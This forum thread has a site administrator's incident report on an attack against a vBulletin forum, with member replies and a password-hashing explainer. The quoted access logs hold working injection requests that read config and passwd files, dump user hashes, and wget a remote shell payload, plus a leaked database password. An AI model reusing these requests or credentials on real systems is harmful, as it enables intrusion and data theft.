Page 1 of 3 123 LastLast
Results 1 to 20 of 58

Thread: Site Hack Attempt

  1. #1
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Site Hack Attempt

    If you want to skip all the tech stuff and get to the bottom line, skip to the bottom of the post.

    On Sunday March 22nd Stealth posted in Hex about some weird activity on two other admin accounts earlier that day. We have a couple of triggers that create a post in a special forum when certain actions are taken, and this tripped one of those triggers.

    Apparently at about 1:30 PM Sunday Darth Red logged in from Holland (which is not where he lives btw), tried to change a bunch of stuff in the admincp but failed because 95% of the technical stuff is locked down to Squid and I. Administrators are given permission to edit forums and users and stuff like that, but not change any of the server settings. Most of them cannot even edit themes. After failing to get what he wanted on Darth's account he tried to access other admin accounts. My account and Squid's account are hardcoded from being changed, so he changed the password for Gigantus and logged in as him which gave him no additional access rights.

    At that point he did edit the one thing he could edit that would allow him to get into the site structure, the FAQ page. There is a known exploit for vBulletin 3.8.6 (we use vBulletin 4.2.2) that will allow an attacker to read the config files for the site and gain database access information. So he edited faq.php back to the vBulletin 3 version, injected a couple of files, read the config files, and attempted to download userids, email addresses, and passwords for the entire site.


    Here is basically the order in which this went down:

    Logged in as Darth at 13:23
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:23:48 -0600] "POST /forums/login.php?do=login HTTP/1.1" 200 2334 "http://www.twcenter.net/forums/showgroups.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    At 13:26 tried to access the newsproxy.php which Darth does not have access to:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:26:12 -0600] "POST /forums/admincp/newsproxy.php HTTP/1.1" 200 3045

    At 13:27 tried to access the plugins, which Darth does not have access to:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:27:01 -0600] "GET /forums/admincp/plugin.php HTTP/1.1" 200 2168 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    At 13:28 edited Gigantus's account, logged out then back in:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:27:36 -0600] "GET /forums/showgroups.php HTTP/1.1" 200 22567 "http://www.twcenter.net/forums/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:28:06 -0600] "POST /forums/login.php?do=login HTTP/1.1" 200 2343

    Here he is trying the vBulletin 3 faq.php exploit out highlighted in red:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:28:39 -0600] "GET /forums/faq.php HTTP/1.1" 200 12124 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:02 -0600] "GET /forums/faq.php?faq=vb3_board_faq HTTP/1.1" 200 12975 "http://www.twcenter.net/forums/faq.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:09 -0600] "GET /forums/faq.php?faq=vb3_reading_posting HTTP/1.1" 200 16559 "http://www.twcenter.net/forums/faq.php?faq=vb3_board_faq" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:29:13 -0600] "GET /forums/admincp/faq.php?faq=vb3_reading_posting HTTP/1.1" 200 2703



    At 13:30 the faq.php page was edited by Darth Red's account. As you can see, there were lots of edits as he tried to get it right.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:23 -0600] "POST /forums/admincp/faq.php?do=update HTTP/1.1" 200 2220 "http://www.twcenter.net/forums/admincp/faq.php?do=edit&faq=vb3_smilies" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:26 -0600] "GET /forums/admincp/faq.php?do=edit&faq=vb3_smilies HTTP/1.1" 200 5348 "http://www.twcenter.net/forums/admincp/faq.php?faq=vb3_reading_posting" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:31 -0600] "POST /forums/admincp/faq.php?do=update HTTP/1.1" 200 2089 "http://www.twcenter.net/forums/admincp/faq.php?do=edit&faq=vb3_smilies" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:33 -0600] "GET /forums/admincp/faq.php?faq=%20vb3_reading_posting HTTP/1.1" 200 2698 "http://www.twcenter.net/forums/admincp/faq.php?do=update" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:41 -0600] "GET /forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B HTTP/1.1" 200 159953 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18 HTTP/1.1" 200 2825 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2536 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:42 -0600] "GET /forums/faq.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2158 "http://www.twcenter.net/forums/faq.php?faq=vb3_reading_posting&c=echo%2099%3B" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:31:43 -0600] "GET /forums/admincp/faq.php?do=edit&faq=vb3_smilies HTTP/1.1" 200 5360

    At 13:33 his first attempt to read the config file for the site. This attempt failed:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:33:34 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3B&faq=vb3_reading_posting&x=cat%20includes%2Fconfig.php HTTP/1.1" 200 81719 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"



    At 13:35 he successfully read the config file, which gave him the database username and password, and he selected the totalwar_vb database on Thor which is the main database for the site:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:35:16 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=cat%20includes%2Fconfig.php HTTP/1.1" 200 13545 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:36:04 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"



    At this point he started poking around other databases as well, though I do not think he was actually able to grab data which I will explain later. That Boonex database is a test I had running and just never killed, it had nothing in it but he was looking for premium member stuff. The database user and password are different on that database, so he couldn't get anything anyways though he did try.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:36:22 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20show%20tables%22 HTTP/1.1" 200 3431 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:37:57 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayChatMemberships%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:13 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayBoardCurrentUsers%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:31 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20RayChatCurrentUsers%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:38:40 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22show%20databases%3B%20use%20boonex%3B%20select%20*%20from%20sys_sbs_users%20%20limit%2010%22 HTTP/1.1" 200 79 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"


    There are several entries like this one where he tried to pull userid, username, email, password, and salt from the users table. Now remember he is running this through a php script, and there are limits on the resources a php script can consume. Processes on the server are limited to 128 megs of RAM per script and a 30 second timeout. There is no way in hell this request fits inside those parameters, so he just got a 500 error.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:41:12 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x





    After dicking around for 20 minutes trying to dump all the users, he set a limit to try and pull the first 10 users. This makes sense, generally the person with the highest level access is userid 1 which is created when the software is installed, and he wants access to an admin account that can do everything. In the case of TWC the people with the most access are myself and Squid and both of our userids are above 22,000. So even if he was able to pull the information for the first 10 users, it doesn't do him any good.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:13:41:12 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Csalt)%20from%20user%20limit%2010%22 HTTP/1.1" 200 810 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    So now instead of trying to pull the whole thing at once, he attempts to dump small pieces at a time into a text file he created on the server named 1.txt so he can just copy the text file later:
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:18:48 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-h%20thor%20-u%20totalwar_vb%20-pthEphA9U93ec%20-e%20%22use%20totalwar_vb%3B%20select%20concat(userid%2C0x3b%2Cusername%2C0x3b%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Csalt)%20from%20user%20%22%20%3E%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"

    Here you can see several attempts to read that text file. Actually he is checking the file size of that file by executing this command that you can see if you strip out the html formatting:
    Code:
    ls -lah /var/www/forums/images/1.txt
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:18:58 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-la%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 92 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:19:03 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-lah%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 87 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:19:11 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=ls%20-lah%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 87 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"


    I am assuming the file size on that was 0 bytes because he didn't open it, he just deleted it. He checked the size and ownership of it several times just before running this command:
    Code:
    rm var/www/forums/images/1.txt
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:22:03 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=rm%20%2Fvar%2Fwww%2Fforums%2Fimages%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"






    Here he tries to login directly to MySQL, this translates to:
    Code:
     mysql -u root -p root
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:25:35 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=mysql%20-u%20root%20-proot%20-e%20%22show%20databases%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    He wouldn't need to do this if he had gotten the information he was looking for with the above queries, and I can promise you that our root password for MySQL is not "root".


    That doesn't work for him, so he tries to use the cat command on the passwd file for the server. Now this file doesn't have actual passwords in it, its just a list of users and what their access rights are. He wants this so he can try to login to the server directly.
    Code:
     cat /etc/passwd
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:25:47 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 1884 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    He is not able to login to the server directly for two reasons:
    1. He doesn't even know the servers IP address. We are hidden behind CloudFlare. There isn't even a log of the attempt.
    2. If he did make it that far, we do not use password authentication. We use encrypted ssh keypairs and there are only 4 authorized keys for out entire network.



    So its time to try another approach. He cannot access the database directly, the port for MySQL is not open to the public its only open on our internal network, and the server he has access to does not actually have the database on it. He has been forced to try and use a php script to pull data from a remote database on thor and is running into the php limits, and limiting his queries to fit within those limits hasn't gotten him what he needs. He hasn't been able to access the server via information in the etc/passwd file.


    Here he uploads a file from a site running a 2012 of WordPress that had already been compromised. This loads a php file into the site images folder that attempts to run a root level access server shell via script so he can gain complete control over the server without having to go through the conventional login methods.
    141.101.104.89 www.twcenter.net - [22/Mar/2015:14:45:18 -0600] "GET /forums/faq.php?c=system(%24_GET%5B%27x%27%5D)%3Bdie()%3B&faq=vb3_reading_posting&x=wget%20-O%20%2Fvar%2Fwww%2Fforums%2Fimages%2Frating%2Frating-trans-15_2.php%20http%3A%2F%2Fwww.waldgeist.org%2Fwp-content%2Fplugins%2F1.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
    This little script created a file named lndex.php which is a php decoder to decode the base64 code he compiled on that WordPress site to try and execute a shell on our server.

    Two minutes after he executes this, he edits faq.php back to its original state to try and cover his tracks and leaves the site. About 5 hours later Stealth noticed the activity when he logged in and created a post about it in Hex. I saw it at about 2 AM Monday morning and locked out Darth and Gig until I could sort a few things out.

    Squid and I (mostly Squid) have been digging through stuff all week. At first we were not sure what the exploit was and how he got inside in the first place. This is why all plugins are currently disabled. Generally speaking plugins are exploited more often than the main software package is. We have permanently removed a few non-essential plugins and the rest will stay disabled until we sort out a couple more things.

    1. We need to verify every single file on the site. The easiest way to do this is to reinstall vanilla files freshly downloaded from vBulletin. We actually needed to do this anyways because I upgraded the site license for the CMS package we are going to install.
    2. We need to reset all of the FAQ pages to vanilla content so we can make sure there wasn't anything left behind. For now the FAQ page link has been removed from the site and is behind a login screen so that it cannot be accessed directly. This is the vBulletin FAQ not the FAQ on the wiki.

    When those two things are done we will start enabling other features again.



    To help prevent this kind of thing in the future we have taken a few steps.
    1. The admincp is no longer called the admincp and is behind another login screen. This means that to get to the admincp you actually have to know exactly where it is and then login twice, once from a hardcoded file that is not stored anywhere within the web files for the site so is not visible from the outside, and once with your normal vBulletin login. The usernames and passwords for that first login are not our normal forum names and will never be posted or PMed on the site. That information will only be sent via email address between admins.
    2. The faq.php page can no longer be edited by administrators. Only by myself and Squid. We don't change it that often anyways so its not a huge problem. I may do the same thing with the Calendar since we hardly ever use it.
    3. I reviewed the permissions of every person on the site that has access to the admincp and removed access from some inactive Tech Staff members. They still have access to the tech forums and if they become active again I will allow limited access to the admincp.
    4. I have changed the hardcoded users that cannot be edited in the admincp to help prevent us from being locked out if someone does manage to get past everything else. There are a few others besides myself and Squid that can only be edited if you have root level server access. I am not naming them in public.
    5. We will be reviewing the need for every single plugin on the site. This will take some time.



    The bottom line here is that the site was breached, but I do not think it was a serious breach. Every member of the site should go ahead and change their password just in case but I am not hugely concerned. vBulletin passwords are not stored in clear text, they are hashed and if its reasonably complex then it would take days just to brute force a single password and generate a match. vBulletin does use MD5 encryption which isn't as good as SHA encryption (changing that would be a HUGE task, one that vBulletin needs to take on) and its not like we have a bunch of sensitive information here. There are no credit cards, no financial records, no real names and addresses, etc. The worst they could do is steal your email address and then trash the site.



    Apologies for the inconvenience.


    EDIT: The one thing we are not clear about here is how Darth's account was compromised that started this whole thing off. It could be malware local on his machine, or someone packet sniffing his network, or any number of other things. An internet café, public wifi someplace. Its hard to tell.
    Last edited by GrnEyedDvl; March 28, 2015 at 01:08 AM.

  2. #2
    Ciciro's Avatar Protector Domesticus
    Join Date
    Jan 2012
    Location
    The Capital
    Posts
    4,038

    Default Re: Site Hack Attempt

    Good thing admins don't have that much power to change things, otherwise this could have been a hell of a lot worse.

  3. #3

    Default Re: Site Hack Attempt

    So from what I've read our passwords have not been taken, like last time, right?


  4. #4
    Cor De Ferrum's Avatar Ordinarius
    Join Date
    Oct 2011
    Location
    United Corporatist States of bank loans
    Posts
    748

    Default Re: Site Hack Attempt

    It is time to come clean.

    I am special agent Oyverstein Veyberg. I am work mossad and am pro hax0r.

  5. #5
    TheDarkKnight's Avatar Compliance will be rewarded
    Moderator Emeritus Content Emeritus Administrator Emeritus

    Join Date
    Oct 2010
    Location
    The good (not South) part of the USA
    Posts
    11,632
    Blog Entries
    12

    Default Re: Site Hack Attempt

    It's kind of frightening what someone can do when they are bored and have nothing better to do. I hope that you can eventually track this person down and give them a good GED smacking...or at least contact their ISP and tell them what they tried to do.

    As Ciciro said, this could have been a lot worse. Glad you guys already had some precautions in case this sort of thing happened.
    Things I trust more than American conservatives:

    Drinks from Bill Cosby, Flint Michigan tap water, Plane rides from Al Qaeda, Anything on the menu at Chipotle, Medical procedures from Mengele

  6. #6

    Default Re: Site Hack Attempt

    My account and Squid's account are hardcoded from being changed, so he changed the password for Gigantus and logged in as him which gave him no additional access rights.
    Just curious, wouldn't it be a good idea to hardcode all admins login?
    Or does the below make that redundant?
    1. The admincp is no longer called the admincp and is behind another login screen. This means that to get to the admincp you actually have to know exactly where it is and then login twice, once from a hardcoded file that is not stored anywhere within the web files for the site so is not visible from the outside, and once with your normal vBulletin login. The usernames and passwords for that first login are not our normal forum names and will never be posted or PMed on the site. That information will only be sent via email address between admins.

  7. #7
    Sir Adrian's Avatar the Imperishable
    Join Date
    Oct 2012
    Location
    Nehekhara
    Posts
    17,363

    Default Re: Site Hack Attempt

    Why I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    Under the patronage of Pie the Inkster Click here to find a hidden gem on the forum!


  8. #8
    Mhaedros's Avatar Brave Heart Tegan
    Content Emeritus

    Join Date
    Feb 2011
    Location
    Finland
    Posts
    8,764
    Blog Entries
    2

    Default Re: Site Hack Attempt

    Quote Originally Posted by Doctor Shuu View Post
    Why I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    Having someones email and password could be surprisingly lucrative I reckon. Especially if they are the sort of person that uses the same password for multiple sites.
    Under the patronage of Finlander. Once patron to someone, no longer.
    Content's well good, innit.


  9. #9

    Default Re: Site Hack Attempt

    Well, they would be very disappointed with me. I use a forum email. My passwords are different for every email I use. I also use a different set for forums.

  10. #10
    The Mad Skylord's Avatar Tribunus
    Join Date
    Nov 2014
    Location
    The RPG Forums
    Posts
    7,493

    Default Re: Site Hack Attempt

    Luckily I have 3 or 4 different passwords lurking all of the time, so my email isn't too bad. The only stuff I pay for is my kindle, and that is on a different email.

    Still, this guy must be a big bloody prick to put our glorious admins so much trouble.

  11. #11
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Re: Site Hack Attempt

    Quote Originally Posted by PikeStance View Post
    Just curious, wouldn't it be a good idea to hardcode all admins login?
    Or does the below make that redundant?
    The main reason you lock down an admin account is so that in case someone gets inside the system they cant lock you out. Since I have physical access to the servers obviously I cannot ever be locked out no matter what they do though it would be a pain in the ass to drive downtown for something like this. But we don't want Squid or a couple of others locked out either, because I cannot always be around. Locking down every single admin just makes administration a pain in the ass. We cant reset their passwords without getting into the operating system, we cant edit their accounts for stuff such as listing them as local mods in a forum or making them group leaders or lots of other things. For the most part they cannot do any serious damage even if they wanted to so there is no reason to lock them down and create the pain of administering the administrators.

    The administrators on TWC site have access rights to do what it is they need to do: administer users and forums. The faq.php page obviously is vulnerable so access to that has been removed. There may be another similar situation we are not aware of yet, but the stuff we know can be exploited (plugins, advertising, themes, maintenance tools, etc) are not needed for general forum administration and is not part of the average administrators duties anyways, so they do not have access to it. Admins cannot hard delete (including myself and Squid without running special database queries), cannot directly access the database, cannot take mass actions like affecting tons of users at once, or cause lots of real damage intentional or otherwise. They simply do not need access to that stuff to do what they do on the forums.


    vBulletin is actually pretty granular about how you can apply admin permissions. Here is a shot of my permissions next to a shot of Darth Red's permissions. Obviously I have everything, as does Squid. But if you look at Darth there is lots of stuff he cannot do. Not because we do not trust him, but because he doesn't need to do anything else. As you can see most of the stuff he cannot do is technical, such as plugins. Anything that can be used to insert malicious code, such as bb codes or CRON jobs or advertising scripts is restricted to Squid and I and even we do not actually access most of that very often. As mentioned obviously the FAQ page is a problem so it has been removed from their permissions set. If we discover something else that is a problem and is not routinely used by administrators we will remove that as well.
    Click image for larger version. 

Name:	adminperms.jpg 
Views:	34 
Size:	128.1 KB 
ID:	323414Click image for larger version. 

Name:	adminperms2.jpg 
Views:	44 
Size:	124.6 KB 
ID:	323413



    Quote Originally Posted by Doctor Shuu View Post
    Why I don't get is why even try to hack a forum. What was that person hoping to get out of it?
    It depends what their personal motivation is. What does someone get out of egging a house or keying a car or tagging a building? In some cases they are looking to make money, in some cases they are just looking to be a general pain in the ass. We have had someone insert their own advertising in the past. That stayed up for about 12 hours until Sim and I figured it out, so they might have made $50 or so at the top end. But unless they are truly familiar with the site, they don't know what they will find. vBulletin has a paid subscription section so that members can pay a monthly/yearly fee for access to certain forums. Obviously we do not use that but they do not know that unless they know the site well or manage to get in and poke around. Even if we did use that, I don't think that feature actually stores anything that could be used such as a credit card number.


    Quote Originally Posted by Mhaedros View Post
    Having someones email and password could be surprisingly lucrative I reckon. Especially if they are the sort of person that uses the same password for multiple sites.
    There is that possibility as well.

  12. #12
    Magister Militum Flavius Aetius's Avatar δούξ θρᾳκήσιου
    Join Date
    Mar 2010
    Location
    Rock Hill, SC
    Posts
    16,318
    Tournaments Joined
    1
    Tournaments Won
    0

    Default Re: Site Hack Attempt

    Even if they got my password they'll be disappointed. The things I need to keep secure all have passwords that might as well be hashed encryptions.

  13. #13
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Re: Site Hack Attempt

    Quote Originally Posted by djehoety View Post
    So from what I've read our passwords have not been taken, like last time, right?
    I do not believe so, but I cannot promise that 100%.

    If he did get information, it looks like this from my account:

    Code:
    mysql> select userid, username, email, salt, password from user where userid = 21866;
    Connection id:    280
    Current database: totalwar_vb
    
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    | userid | username   | email                     | salt                           | password                         |
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    |  21866 | GrnEyedDvl | REMOVED | 8Z}X$247@esoXJXF#&c~",}$5934hui06yhe0CEdL | 60744474c3277428a8be861186e1e368 |
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    1 row in set (0.57 sec)
    Now, that is not truly my password. Its not even truly my hash or my salt as I changed it before I posted here. When you create your password on TWC it generates what is called a "salt" which is just a randomized set of characters, adds that to the characters you entered for your password, and then generates an MD5 encryption hash out of that combination. The more complex your password is the more complex the hash is and the harder it is to generate a match. The salt and the MD5 hash are what is stored in the database.

    When you enter your password in TWC to login, it takes the characters you entered and adds them to the stored salt value and then uses that value to generate an MD5 hash. It then compares that hash to the hash stored in the database. If they match, you are allowed to login. If they do not match, you are denied.

    If someone managed to grab all that information from my account, they would still have to try a crapload of passwords to try and generate a hash that matches. This is what the "brute force" crack attempt is. They are generating tons of hashes using random characters trying to get a match. The weakness in MD5 is that occasionally you can generate identical hashes with two different password and salt combinations. This is much less likely to happen with newer encryptions like SHA-2.

    if you want to see how this works live then check out this hash encryption generator. You can enter a generic password and see the hash it generates. You can also change the salt value and see that it generates a different hash even if you use the same password.

    For example I entered this:

    Password = password
    Salt = s0mRIdlKvI
    MD5 Hash = 60744474c3277428a8be861186e1e368


    But if I change the salt to 12345 and still use "password" as my password I get a hash of:

    40b1b887502902a8ce61a16e44630f7c



    And if I change the salt to "ABCDEF" I get:

    5ffc552079866e04eacbd73225663dd5


    And if the salt is "abcdef" I get:

    db7dba848f1e5f257618ece2d8a562e1


    So even if this person managed to grab the salt and hash of every member of the site, he still has to spend a TON of time trying to brute force the passwords. He may farm some of that out to hacker collectives but I doubt its worth the time for him to do that for TWC members since we do not have any financial data on the site at all. The most productive use of time would be to try and brute force the accounts of me and Squid. Mine would take him bloody forever to run through all the possibilities. And when I say forever, I mean something like 386 quintillion years to try every single possibility and generates 9,000 keystrokes per second. He may get a lucky hit but the odds of that are pretty low.

    You can test your password for length of time it takes to guaranty a brute force attack on it at this site. Select FreeBSD MD5 as the algorithm, enter the number of characters in your password, and select how complex it is and it will tell you how many days/hours/seconds it would take to try every single possibility. The longer your password, the longer it takes to try every possible combination.

    If your password is just a 6 digit number, it takes about 2 minutes. Change that to a 10 digit number and it takes 13 days. Change that to a 15 digit number and it takes 4 thousand years if he is generating 9,000 key strokes per second on his attempt. Once you start adding character types the length of time required to crack it goes up exponentially. My passwords are all 15+ characters long and have lots of weird stuff in them, so to try all combinations would literally take forever unless they got a lucky hit.

    Modern brute force attempts are using video cards to process LOTS more keystrokes than they used to be able to do with standard CPUs. In the neighborhood of 348 billion attempts per second on some algorithms as demonstrated in this article on a machine with 25 high end video cards installed on a server platform. This one cracked 14 character Windows passwords in about 6 minutes. the good thing is that your average hacker cannot come close to affording something like this. I bet this is a $20,000 setup.

    The clustered GPUs clocked impressive speeds against more sturdy hashing algorithms as well, including MD5 (180 billion attempts per second, 63 billion/second for SHA1 and 20 billion/second for passwords hashed using the LM algorithm. So called “slow hash” algorithms fared better. The bcrypt (05) and sha512crypt permitted 71,000 and 364,000 per second, respectively.
